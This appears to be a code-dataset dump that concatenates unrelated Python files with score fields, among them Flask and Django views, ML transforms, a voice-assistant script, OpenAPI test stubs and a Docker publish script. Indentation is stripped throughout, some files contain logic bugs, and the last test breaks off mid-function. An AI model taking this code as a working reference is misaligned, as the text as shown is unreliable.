# refdata is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Fixtures for testing the command-line interface."""
import os
import pytest
from click.testing import CliRunner
from refdata.db import DB
import refdata.config as config
@pytest.fixture
def refdata_cli(tmpdir):
"""Initialize the environment and the database for the local store."""
basedir = os.path.abspath(str(tmpdir))
connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))
DB(connect_url=connect_url).init()
os.environ[config.ENV_BASEDIR] = basedir
os.environ[config.ENV_URL] = connect_url
# Make sure to reset the database.
yield CliRunner()
# Clear environment variables that were set for the test runner.
del os.environ[config.ENV_BASEDIR]
del os.environ[config.ENV_URL]
| 1.953125 | 2 |
swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py | lhoestq/DeDLOC | 0 | 1275 | <filename>swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import math
from typing import Any, Dict
import numpy as np
from classy_vision.dataset.transforms import register_transform
from classy_vision.dataset.transforms.classy_transform import ClassyTransform
@register_transform("ImgPatchesFromTensor")
class ImgPatchesFromTensor(ClassyTransform):
"""
Create image patches from a torch Tensor or numpy array.
This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246
Args:
num_patches (int): how many image patches to create
patch_jitter (int): space to leave between patches
"""
def __init__(self, num_patches=9, patch_jitter=21):
self.num_patches = num_patches
self.patch_jitter = patch_jitter
assert self.patch_jitter > 0, "Negative jitter not supported"
self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3
logging.info(
f"ImgPatchesFromTensor: num_patches: {num_patches} "
f"patch_jitter: {patch_jitter}"
)
def __call__(self, image):
"""
Input image which is a torch.Tensor object of shape 3 x H x W
"""
data = []
grid_size = int(image.shape[1] / self.grid_side_len)
patch_size = grid_size - self.patch_jitter
jitter = np.random.randint(
0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len)
)
for i in range(self.grid_side_len):
for j in range(self.grid_side_len):
x_offset = i * grid_size
y_offset = j * grid_size
grid_cell = image[
:, y_offset : y_offset + grid_size, x_offset : x_offset + grid_size
]
patch = grid_cell[
:,
jitter[1, i, j] : jitter[1, i, j] + patch_size,
jitter[0, i, j] : jitter[0, i, j] + patch_size,
]
assert patch.shape[1] == patch_size, "Image not cropped properly"
assert patch.shape[2] == patch_size, "Image not cropped properly"
# copy patch data so that all patches are different in underlying memory
data.append(np.copy(patch))
return data
@classmethod
def from_config(cls, config: Dict[str, Any]) -> "ImgPatchesFromTensor":
"""
Instantiates ImgPatchesFromTensor from configuration.
Args:
config (Dict): arguments for for the transform
Returns:
ImgPatchesFromTensor instance.
"""
num_patches = config.get("num_patches", 9)
patch_jitter = config.get("patch_jitter", 21)
logging.info(f"ImgPatchesFromTensor | Using num_patches: {num_patches}")
logging.info(f"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}")
return cls(num_patches=num_patches, patch_jitter=patch_jitter)
| 2.3125 | 2 |
python/jittor/utils/publish.py | Jittor/Jittor | 4 | 1276 | #!/usr/bin/python3
# ***************************************************************
# Copyright (c) 2022 Jittor. All Rights Reserved.
# Maintainers:
# <NAME> <<EMAIL>>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************
# Publish steps:
# 1. build,push,upload docker image[jittor/jittor]
# 2. build,push,upload docker image[jittor/jittor-cuda]
# upload to pip:
# rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*
import os
def run_cmd(cmd):
print("[run cmd]", cmd)
assert os.system(cmd) == 0
def upload_file(path):
run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")
def docker_task(name, build_cmd):
run_cmd(build_cmd)
run_cmd(f"sudo docker push {name}")
bname = os.path.basename(name)
run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
upload_file(f"/tmp/{bname}.tgz")
docker_task(
"jittor/jittor-cuda-11-1",
"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)
docker_task(
"jittor/jittor",
"sudo docker build --tag jittor/jittor:latest . --network host"
)
docker_task(
"jittor/jittor-cuda",
"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)
docker_task(
"jittor/jittor-cuda-10-1",
"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)
run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update") | 1.882813 | 2 |
prodapt_solutions/config/cliargs.py | DineshDevaraj/interview_answers | 0 | 1277 | <gh_stars>0
import argparse
from helper.metaclasses_definition import Singleton
class CliArgs(metaclass=Singleton):
LogLevel = None
BankName = None
InputFilepath = None
@staticmethod
def init():
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--bank-name', required=True)
my_parser.add_argument('--input-filepath')
my_parser.add_argument('--log-level')
args = my_parser.parse_args()
CliArgs.BankName = args.bank_name
CliArgs.InputFilepath = args.input_filepath
CliArgs.LogLevel = args.log_level
| 2.515625 | 3 |
plugins/flytekit-papermill/setup.py | TeoZosa/flytekit | 0 | 1278 | from setuptools import setup
PLUGIN_NAME = "papermill"
microlib_name = f"flytekitplugins-{PLUGIN_NAME}"
plugin_requires = [
"flytekit>=0.16.0b0,<1.0.0",
"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0",
"papermill>=1.2.0",
"nbconvert>=6.0.7",
"ipykernel>=5.0.0",
]
__version__ = "0.0.0+develop"
setup(
name=microlib_name,
version=__version__,
author="flyteorg",
author_email="<EMAIL>",
description="This is the flytekit papermill plugin",
namespace_packages=["flytekitplugins"],
packages=[f"flytekitplugins.{PLUGIN_NAME}"],
install_requires=plugin_requires,
license="apache2",
python_requires=">=3.7",
classifiers=[
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| 1.304688 | 1 |
2017/third.py | vla3089/adventofcode | 0 | 1279 | #!/usr/bin/env python
input = 368078
size = 1
s_size = size * size # squared size
while (s_size < input):
size += 2
s_size = size * size
bottom_right = s_size
bottom_left = s_size - size + 1
top_left = s_size - 2 * size + 2
top_right = s_size - 3 * size + 3
input_x = -1
input_y = -1
# bottom horizontal line
if (input > bottom_left):
input_x = size - 1
input_y = input - bottom_left
elif (input > top_left):
input_y = input - top_left
input_x = 0
elif (input > top_right):
input_x = 0
input_y = size - input + top_right - 1
else:
input_x = top_right - input
input_y = size - 1
ap_x = size / 2
ap_y = ap_x
print abs(ap_x - input_x) + abs(ap_y - input_y)
| 3.21875 | 3 |
racer/methods/genetic_programming/parameterized.py | max-eth/racer | 1 | 1280 | <filename>racer/methods/genetic_programming/parameterized.py<gh_stars>1-10
import copy
import numpy as np
from racer.utils import load_pickle
from racer.methods.genetic_programming.program_tree import ProgramTree
class ParameterizedTree(ProgramTree):
# This makes the assumption that all children of the underlying tree are in a field .children and that the underlying tree has the field .name
def __init__(self, underlying_tree, init_fct=None, _copy=True):
if _copy:
underlying_tree = copy.deepcopy(underlying_tree) # safety first
if hasattr(underlying_tree, "children"):
underlying_tree.children = [
ParameterizedTree(underlying_tree=child, _copy=False)
for child in underlying_tree.children
]
self.underlying_tree = underlying_tree
if init_fct is None:
self.set_params([1, 0])
else:
self.set_params(init_fct())
def set_params(self, params):
self.weight, self.bias = params
self.name = self.underlying_tree.name + " * {} + {}".format(
self.weight, self.bias
)
def get_params(self):
return [self.weight, self.bias]
def __call__(self, *x):
return self.underlying_tree(*x) * self.weight + self.bias
def __len__(self):
return len(self.underlying_tree)
def display(self, prefix):
res = prefix + self.name + "\n"
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
res += child.display(prefix=" " + prefix)
return res
def _set_dirty(self):
raise Exception("Parameterized trees should not be mutated")
def in_order(self):
yield self
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
for node in child.in_order():
yield node
class ParameterizedIndividual:
def __init__(self, parameterized_trees):
self.parameterized_trees = parameterized_trees
@staticmethod
def from_individual(ind):
return ParameterizedIndividual(
parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]
)
@staticmethod
def from_pickled_individual(fname):
return ParameterizedIndividual.from_individual(load_pickle(fname))
def __call__(self, *x):
return [tree(*x) for tree in self.parameterized_trees]
def __len__(self):
return sum(len(tree) for tree in self.parameterized_trees)
def set_flat_parameters(self, params):
n_used = 0
for tree in self.parameterized_trees:
for node in tree.in_order():
node.set_params(list(params[n_used : n_used + 2]))
n_used += 2
def get_flat_parameters(self):
params = []
for tree in self.parameterized_trees:
for node in tree.in_order():
params += node.get_params()
return np.array(params)
| 2.609375 | 3 |
base/frontends/views.py | danielecook/upvote.pub | 1 | 1281 | <reponame>danielecook/upvote.pub
# -*- coding: utf-8 -*-
"""
"""
import os
import markdown2
from flask import (Blueprint,
request,
render_template,
flash, g,
session,
redirect,
url_for,
abort,
Markup)
from werkzeug import check_password_hash, generate_password_hash
from logzero import logger
from base import db, app
from base import search as search_module # don't override function name
from base.users.forms import RegisterForm, LoginForm
from base.users.models import User
from base.threads.models import Thread, Publication
from base.subreddits.models import Subreddit
from base.users.decorators import requires_login
from base.utils.user_utils import get_school
from base.subreddits.forms import subreddit_subs, sub_form
from base.utils.email import send_email
from base.utils.misc import random_string, validate_sort_type
mod = Blueprint('frontends', __name__, url_prefix='')
@mod.before_request
def before_request():
g.user = None
if session.get('user_id'):
g.user = User.query.get(session['user_id'])
def home_subreddit():
logger.info(g.user)
if g.get('user'):
subreddit_subs = g.user.subreddit_subs.get('subs')
subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \
.filter(Subreddit.name.in_(subreddit_subs))
else:
subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))
return subs
def get_subreddits():
"""
Fetch user subreddits otherwise fetch a list of defaults
"""
if g.get('user'):
subreddit_subs = g.user.subreddit_subs.get('subs')
subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs))
else:
# Default set of subreddits
subreddits = Subreddit.query.all()
return subreddits
def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'):
"""
abstracted because many sources pull from a thread listing
source (subreddit permalink, homepage, etc)
"""
threads_per_page = 15
cur_page = request.args.get('page') or 1
cur_page = int(cur_page)
thread_paginator = None
# if we are passing in a resultset, that means we are just looking to
# quickly paginate some arbitrary data, no sorting
if rs:
thread_paginator = rs.paginate(cur_page,
per_page=threads_per_page,
error_out=True)
return thread_paginator
# sexy line of code :)
base_query = subreddit.threads if subreddit else Thread.query
# Filter by user subs
logger.info(g.user)
if g.user:
subreddit_subs = g.user.subreddit_subs.get('subs')
base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs))
# Sorting
if sort_type == 'hot':
base_query = base_query.order_by(db.desc(Thread.hotness))
elif sort_type == 'top':
base_query = base_query.order_by(db.desc(Thread.votes))
elif sort_type == 'comments':
base_query = base_query.order_by(db.desc(Thread.n_comments))
elif sort_type == 'new':
base_query = base_query.order_by(db.desc(Thread.created_on))
elif sort_type == 'publication_date':
base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date))
thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True)
return thread_paginator
@mod.route('/')
def home(sort_type='hot'):
"""
If not trending we order by creation date
"""
atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True)
trending = True if request.path.endswith('trending') else False
page_title = "Trending" if trending else "Frontpage"
thread_paginator = process_thread_paginator(trending=trending)
return render_template('home.html',
atom_url=atom_url,
page_title=page_title,
cur_subreddit=home_subreddit(),
thread_paginator=thread_paginator)
@mod.route('/.atom')
@mod.route('/.xml')
@mod.route('/.rss')
def atom_redirect():
return redirect(url_for("subreddits.atom_feed", subreddit_name="frontpage"))
@mod.route('/h/<string:page>')
def render_markdown(page):
page_md = f"base/markdown/{page}.md"
if not os.path.exists(page_md):
abort(404)
with open(page_md, 'r') as f:
content = f.read()
md = markdown2.markdown(content,
extras = ['fenced-code-blocks',
'nofollow',
'target-blank-links',
'toc',
'tables',
'footnotes',
'metadata',
'markdown-in-html'])
return render_template('markdown.html',
page=md,
**md.metadata)
@mod.route('/search/', methods=['GET'])
def search():
"""
Allows users to search threads and comments
"""
query = request.args.get('query')
page_title=f"Search results for '{query}'"
rs = search_module.search(query, orderby='creation', search_title=True,
search_text=True)
thread_paginator = process_thread_paginator(rs=rs)
#rs = rs.all()
num_searches = rs.count()
subreddits = get_subreddits()
return render_template('home.html',
page_title=page_title,
cur_subreddit=home_subreddit(),
thread_paginator=thread_paginator,
num_searches=num_searches)
@mod.route('/login/', methods=['GET', 'POST'])
def login():
"""
We had to do some extra work to route the user back to
his or her original place before logging in
"""
if g.user:
return redirect(url_for('frontends.home'))
next = ''
if request.method == 'GET':
if 'next' in request.args:
next = request.args['next']
form = LoginForm(request.form)
# make sure data is valid, but doesn't validate password is right
if form.validate_on_submit():
# continue where we left off if so
user = User.query.filter_by(email=form.email.data).first()
# we use werzeug to validate user's password
if user and check_password_hash(user.password, form.password.data):
# the session can't be modified as it's signed,
# it's a safe place to store the user id
session['user_id'] = user.id
if 'next' in request.form and request.form['next']:
return redirect(request.form['next'])
return redirect(url_for('frontends.home'))
flash('Wrong email or password', 'danger')
return render_template("login.html", form=form, next=next)
@mod.route('/logout/', methods=['GET', 'POST'])
@requires_login
def logout():
session.pop('user_id', None)
return redirect(url_for('frontends.home'))
@mod.route('/confirm-email/<string:token>')
def confirm_email(token):
"""
Confirm user email
"""
user = User.query.filter_by(email_token=token).first()
if user.email_token == token:
user.email_verified = True
db.session.commit()
flash("Thank you for confirming your email! You can now submit and comment.", 'success')
return redirect(url_for('frontends.home'))
@mod.route('/register/', methods=['GET', 'POST'])
def register():
"""
Registration page
"""
if g.user:
# If the user is logged in send them home
return redirect(url_for('frontends.home'))
next = ''
if request.method == 'GET':
if 'next' in request.args:
next = request.args['next']
form = RegisterForm(request.form)
if form.validate_on_submit():
# create an user instance not yet stored in the database
user = User(username=form.username.data,
email=form.email.data, \
password=generate_password_hash(form.password.data),
university=get_school(form.email.data),
email_token=random_string())
# Insert the record in our database and commit it
db.session.add(user)
email_confirm_link = url_for('frontends.confirm_email', token = user.email_token)
email_response = send_email("Confirm upvote.pub email",
"""Please visit the link below to confirm your email:\n\n{}{}""".format(request.url_root.strip("/"), email_confirm_link),
user.email)
# Log the user in, as he now has an id
db.session.commit()
session['user_id'] = user.id
flash('Thanks for signing up! Please confirm your email by following the link sent in the confirmation email.', 'success')
if 'next' in request.form and request.form['next']:
return redirect(request.form['next'])
return redirect(url_for('frontends.home'))
return render_template("register.html", form=form, next=next)
@mod.route('/subs/', methods=['GET', 'POST'])
def view_all():
"""
"""
subreddit_list = Subreddit.query.all()
form = None
if g.user:
if request.form:
form = subreddit_subs(request.form)
if form.validate_on_submit():
form_subs = form.data.get('subs')
form_subs = list(set([x['sub_name'] for x in form_subs if x['value']]))
g.user.subreddit_subs = {'subs': form_subs}
flash("Updated Subs", 'success')
db.session.commit()
else:
form = subreddit_subs()
for subreddit in subreddit_list:
sform = sub_form()
sform.sub_name = subreddit.name
sform.sub_group = subreddit.group
if g.user:
sform.value=subreddit.name in g.user.subreddit_subs['subs']
form.subs.append_entry(sform)
return render_template('subreddits/subs.html',
cur_subreddit=None,
page_title='subs',
form=form,
subreddit_list=subreddit_list)
| 2.296875 | 2 |
Jarvis.py | vijayeshmt/Securitylock | 1 | 1282 | import pyttsx3
import datetime
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import smtplib
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
# To change the voice to female change 0 to 1.
def speak(audio):
engine.say(audio)
engine.runAndWait()
pass
def take_command():
"""
It takes microphone input from the user and returns a string
:return:
"""
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1.5 # It will wait 1.5 seconds to complete a sentence
audio = r.listen(source)
#Do read details
try:
print("Recognizing")
query = r.recognize_google(audio,language='en-in')
print(f'user said : {query}\n')
except Exception as e:
#print(e)
print("Say that again please")
return "None"
return query
def sendEmail(to,content):
server =smtplib.SMTP('smtp.gmail.com',28)
# server.connect("smtp.gmail.com",465)
# server.ehlo()
server.login('<EMAIL>','########')
server.sendmail('<EMAIL>',to,content)
server.close()
def wish_me():
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour < 12:
speak("Good morning")
elif hour >= 12 and hour < 18:
speak("Good afternoon")
else:
speak("Good night")
speak("I am JARVIS how can i help you")
if __name__ == '__main__':
wish_me()
while True:
query =take_command().lower()
if 'wikipedia' in query:
speak("Searching wikipedia")
query = query.replace('wikipedia','')
results = wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence decreease sentence
speak("According to wikipedia")
#print(results)
speak(results)
elif 'open youtube' in query:
# webbrowser.Chrome.open_new("youtube.com")
webbrowser.open("youtube.com")
elif "open google" in query:
webbrowser.open("google.com")
elif "play music" in query:
music_dir = "D:\\vijayesh\\music"
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir,songs[1]))
elif "the time" in query:
strtime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"The time is {strtime}")
elif " open pycharm" in query:
pycharmpath ="C:\\Program Files\\JetBrains\\PyCharm Community Edition 2021"
os.startfile(pycharmpath)
#elif "open command" in query:
# filelocation = "path of the particular file like above"
# os.startfile(filelocation)
elif " email to vijayesh" or "email to vijesh" in query:
try:
speak("What should i say")#error present
content = take_command()
to = "<EMAIL>"
sendEmail(to,content)
speak("Email has been sent")
exit()
except Exception as e:
print(e)
speak("Sorry,I am not able to send this email")
exit()
| 3.453125 | 3 |
clients/kratos/python/test/test_v0alpha1_api.py | kolotaev/sdk | 0 | 1283 | """
Ory Kratos API
Documentation for all public and administrative Ory Kratos APIs. Public and administrative APIs are exposed on different ports. Public APIs can face the public internet without any protection while administrative APIs should never be exposed without prior authorization. To protect the administative API port you should use something like Nginx, Ory Oathkeeper, or any other technology capable of authorizing incoming requests. # noqa: E501
The version of the OpenAPI document: v0.7.0-alpha.1
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import unittest
import ory_kratos_client
from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501
class TestV0alpha1Api(unittest.TestCase):
"""V0alpha1Api unit test stubs"""
def setUp(self):
self.api = V0alpha1Api() # noqa: E501
def tearDown(self):
pass
def test_admin_create_identity(self):
"""Test case for admin_create_identity
Create an Identity # noqa: E501
"""
pass
def test_admin_create_self_service_recovery_link(self):
"""Test case for admin_create_self_service_recovery_link
Create a Recovery Link # noqa: E501
"""
pass
def test_admin_delete_identity(self):
"""Test case for admin_delete_identity
Delete an Identity # noqa: E501
"""
pass
def test_admin_get_identity(self):
"""Test case for admin_get_identity
Get an Identity # noqa: E501
"""
pass
def test_admin_list_identities(self):
"""Test case for admin_list_identities
List Identities # noqa: E501
"""
pass
def test_admin_update_identity(self):
"""Test case for admin_update_identity
Update an Identity # noqa: E501
"""
pass
def test_create_self_service_logout_flow_url_for_browsers(self):
"""Test case for create_self_service_logout_flow_url_for_browsers
Create a Logout URL for Browsers # noqa: E501
"""
pass
def test_get_json_schema(self):
"""Test case for get_json_schema
"""
pass
def test_get_self_service_error(self):
"""Test case for get_self_service_error
Get Self-Service Errors # noqa: E501
"""
pass
def test_get_self_service_login_flow(self):
"""Test case for get_self_service_login_flow
Get Login Flow # noqa: E501
"""
pass
def test_get_self_service_recovery_flow(self):
"""Test case for get_self_service_recovery_flow
Get Recovery Flow # noqa: E501
"""
pass
def test_get_self_service_registration_flow(self):
"""Test case for get_self_service_registration_flow
Get Registration Flow # noqa: E501
"""
pass
def test_get_self_service_settings_flow(self):
"""Test case for get_self_service_settings_flow
Get Settings Flow # noqa: E501
"""
pass
def test_get_self_service_verification_flow(self):
"""Test case for get_self_service_verification_flow
Get Verification Flow # noqa: E501
"""
pass
def test_initialize_self_service_login_flow_for_browsers(self):
"""Test case for initialize_self_service_login_flow_for_browsers
Initialize Login Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_login_flow_without_browser(self):
"""Test case for initialize_self_service_login_flow_without_browser
Initialize Login Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_recovery_flow_for_browsers(self):
"""Test case for initialize_self_service_recovery_flow_for_browsers
Initialize Recovery Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_recovery_flow_without_browser(self):
"""Test case for initialize_self_service_recovery_flow_without_browser
Initialize Recovery Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_registration_flow_for_browsers(self):
"""Test case for initialize_self_service_registration_flow_for_browsers
Initialize Registration Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_registration_flow_without_browser(self):
"""Test case for initialize_self_service_registration_flow_without_browser
Initialize Registration Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_settings_flow_for_browsers(self):
"""Test case for initialize_self_service_settings_flow_for_browsers
Initialize Settings Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_settings_flow_without_browser(self):
"""Test case for initialize_self_service_settings_flow_without_browser
Initialize Settings Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_verification_flow_for_browsers(self):
"""Test case for initialize_self_service_verification_flow_for_browsers
Initialize Verification Flow for Browser Clients # noqa: E501
"""
pass
def test_initialize_self_service_verification_flow_without_browser(self):
"""Test case for initialize_self_service_verification_flow_without_browser
Initialize Verification Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_submit_self_service_login_flow(self):
"""Test case for submit_self_service_login_flow
Submit a Login Flow # noqa: E501
"""
pass
def test_submit_self_service_logout_flow(self):
"""Test case for submit_self_service_logout_flow
Complete Self-Service Logout # noqa: E501
"""
pass
def test_submit_self_service_logout_flow_without_browser(self):
"""Test case for submit_self_service_logout_flow_without_browser
Perform Logout for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_submit_self_service_recovery_flow(self):
"""Test case for submit_self_service_recovery_flow
Complete Recovery Flow # noqa: E501
"""
pass
def test_submit_self_service_registration_flow(self):
"""Test case for submit_self_service_registration_flow
Submit a Registration Flow # noqa: E501
"""
pass
def test_submit_self_service_settings_flow(self):
"""Test case for submit_self_service_settings_flow
Complete Settings Flow # noqa: E501
"""
pass
def test_submit_self_service_verification_flow(self):
"""Test case for submit_self_service_verification_flow
Complete Verification Flow # noqa: E501
"""
pass
def test_to_session(self):
"""Test case for to_session
Check Who the Current HTTP Session Belongs To # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 2.140625 | 2 |
osrsapi/__init__.py | XaKingas/osrsapi | 0 | 1284 | from .grandexchange import GrandExchange, GameItemNotFound, GameItemParseError
from .item import Item
from .priceinfo import PriceInfo
from .pricetrend import PriceTrend
| 1.25 | 1 |
utils/data_loader.py | dilum1995/DAugmentor | 1 | 1285 | <gh_stars>1-10
import pandas as pd
import os
import numpy as np
import cv2
from utils import constants as const
import matplotlib.pyplot as plt
class DataLoader:
def load_data():
'''
This function is handling the data loading and pre-processing
:return: (xtrain, ytrain), (xtest, ytest)
'''
print('**** Read data into DAugmentor ****')
x_train = []
y_train = []
x_test = []
y_test = []
# setting the path to metadata
path = const.PATH
metadata_csv_path = os.path.join(path, const.FILE_METADATA)
test_img_dir_path = os.path.join(path, const.DIR_TEST)
train_img_dir_path = os.path.join(path, const.DIR_TRAIN)
print(metadata_csv_path)
# setting the path to train data
x_train_path = os.path.join(path, const.DIR_TRAIN)
print(x_train_path)
# setting the path to train data
x_test_path = os.path.join(path, const.DIR_TEST)
# reading meta data file as dataframe
df = pd.read_csv(metadata_csv_path, delimiter=',')
# dataset format:
# image_name
# label
# data_type
data_type_row = df["data_type"].tolist()
image_row = df["image_name"].tolist()
label_row = df["label"].tolist()
data_rows = len(data_type_row)
for row in range(data_rows):
if (data_type_row[row] == "TRAIN"):
# setting the path of the current image
img_path = os.path.join(train_img_dir_path, image_row[row])
# reading image
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
# downscaling image to 28x28
image = cv2.resize(image, (128, 128))
x_train.append(image)
print("Loaded: " + img_path)
# extracting labels
y_train.append(label_row[row])
if (data_type_row[row] == "TEST"):
# setting the path of the current image
img_path = os.path.join(test_img_dir_path, image_row[row])
# reading image
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
# downscaling image to 28x28
image = cv2.resize(image, (128, 128))
x_test.append(image)
print("Loaded: " + img_path)
# extracting labels
y_test.append(label_row[row])
xtrain = np.asarray(x_train)
ytrain = np.asarray(y_train)
xtest = np.asarray(x_test)
ytest = np.asarray(y_test)
print(x_train[0].shape)
print(x_train[0].shape)
print(xtrain[0].shape)
print(x_test[0].shape)
#(X_train, y_train), (X_test, y_test)
return (xtrain, ytrain), (xtest, ytest) | 3.203125 | 3 |
CompilerPython/LexerPython/main.py | valternunez/Compiler | 0 | 1286 | <filename>CompilerPython/LexerPython/main.py
from lexer import *
import sys
if len(sys.argv) != 2:
print("usage: main.py file")
else:
lex = Lexer(sys.argv[1])
with open(sys.argv[1]) as f:
while True:
c = f.read(1)
if not c:
break
print(lex.scan().toString())
| 2.984375 | 3 |
cms/tests/test_views.py | Ibrahem3amer/bala7 | 0 | 1287 | <reponame>Ibrahem3amer/bala7<filename>cms/tests/test_views.py
from django.core.urlresolvers import resolve
from django.urls import reverse
from django.test import TestCase, RequestFactory
from django.http import HttpRequest, Http404
from django.contrib.auth.models import User
from unittest import skip
from users.models import University, Faculty, Department, UserProfile
from cms.models import Topic
from cms.views import get_topic
class AccessRestriction(TestCase):
def setUp(self):
self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>')
self.uni = University.objects.create(name='test_university')
self.fac = Faculty.objects.create(name='Test faculty')
self.dep = Department.objects.create(name='Test dep')
self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)
self.topic = Topic.objects.create(name='cs', desc="test test test", faculty=self.fac, term=1)
self.topic.department.add(self.dep)
self.user.profile = self.profile
self.profile.topics.add(self.topic)
def test_return_topic_that_match_user(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
response = get_topic(request, self.dep.id, self.topic.id)
# Assert test
self.assertEqual(200, response.status_code)
def test_return_topic_that_has_different_department(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
another_dep = Department.objects.create()
try:
response = get_topic(request, another_dep.id, self.topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_does_not_exist(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
try:
response = get_topic(request, self.dep.id, 990)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_outside_user_topics(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request, self.dep.id, outsider_topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_get_topic_with_no_parameters(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
class TableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/table_main.html')
def test_page_redirect_on_post(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.post(url)
# Assert test
self.assertEqual(302, request.status_code)
def test_page_redirect_on_no_profile(self):
# Setup test
user = User.objects.create_user(
username='test_username',
email='<EMAIL>',
password='<PASSWORD>'
)
url = reverse('web_dep_table')
request = self.client.login(username="test_username", password="<PASSWORD>")
# Exercise test
